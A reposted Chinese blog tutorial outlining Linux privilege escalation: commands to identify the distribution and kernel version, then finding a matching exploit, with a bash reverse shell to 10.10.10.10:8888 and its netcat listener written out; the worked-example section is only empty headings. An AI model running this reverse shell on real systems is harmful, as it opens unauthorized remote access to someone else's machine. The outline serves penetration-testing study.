Linux系统漏洞提权

转载自：http://wyb0.com/posts/Linux下系统漏洞提权/

0x00 Linux下的提权

Linux下一般都是系统漏洞提权，分为以下几个步骤：
1. 获取系统版本号
2. 根据系统版本号找对应exp
3. 反弹shell
4. 尝试利用

0x01 提权

获取系统版本号
- 获取发行版本
  - cat /etc/*-release
  - cat /etc/issue
  - cat /etc/lsb-release
  - cat /etc/redhat-release
- 获取内核版本
  - cat /proc/version
  - uname -a
  - uname -mrs
  - rpm -q kernel
  - dmesg | grep Linux
  - ls /boot | grep vmlinuz
根据系统版本号找对应exp
反弹shell
- 本地：nc -l -p 8888
- 目标机器：/bin/bash -i >& /dev/tcp/10.10.10.10/8888 0>&1
尝试利用

0x02 实例

得到系统版本号
找对应exp
反弹shell
提权

附上一个链接：提权圣经【捂脸】http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

版权声明：本文来源CSDN，感谢博主原创文章，遵循 CC 4.0 by-sa 版权协议，转载请附上原文出处链接和本声明。
原文链接：https://blog.csdn.net/qq_20307987/article/details/65443902
站方申明：本站部分内容来自社区用户分享，若涉及侵权，请联系站方删除。

发表于 2020-03-07 18:16:37
阅读 ( 1308 )
分类：Linux

Linux系统漏洞提权

0x00 Linux下的提权

0x01 提权

0x02 实例

你可能感兴趣的文章

精选的优质文章

0 条评论

官方社群

GO教程

推荐文章

猜你喜欢

随便看看